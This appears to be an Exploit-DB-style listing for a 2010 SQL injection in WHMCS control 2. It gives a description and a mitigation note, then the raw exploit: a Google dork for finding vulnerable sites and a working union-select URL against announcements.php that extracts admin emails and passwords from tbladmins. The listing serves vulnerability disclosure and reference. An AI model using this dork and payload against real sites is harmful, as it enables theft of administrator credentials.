WHMCS control 2 Sql Injection

vendor:

WHMCS control 2

by:

Islam DefenDers

7,5

CVSS

HIGH

Remote Sql Injection

CWE

Product Name: WHMCS control 2

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

WHMCS control 2 Sql Injection

A remote SQL injection vulnerability exists in WHMCS control 2. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and other confidential data stored in the database.

Mitigation:

Apply the latest security patches and ensure that all web applications are up to date.

Source

Exploit-DB raw data:

Software: WHMCS control 2  Sql Injection             
                                                                         
Vulnerability: Remote Sql Injection                                      
Google Dork: Powered by WHMCompleteSolution - or "  inurl:WHMCS   or'     announcements.php   
Off. site: www.MiXaTy.com                                               


Author
Author: Islam DefenDers                            
Date: 2.5.2010                                   
Contact:  email: hackereg@hotmail.com             


Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--                                        
DOWNLOAD : http://www.whmcs.com/                                                                                
Greetz
IsLam DefenDers Mr.HaMaDa 


HaMaDa SCoOoRPioN 

site: www.mixaty.com

E: hackereg@hotmail.com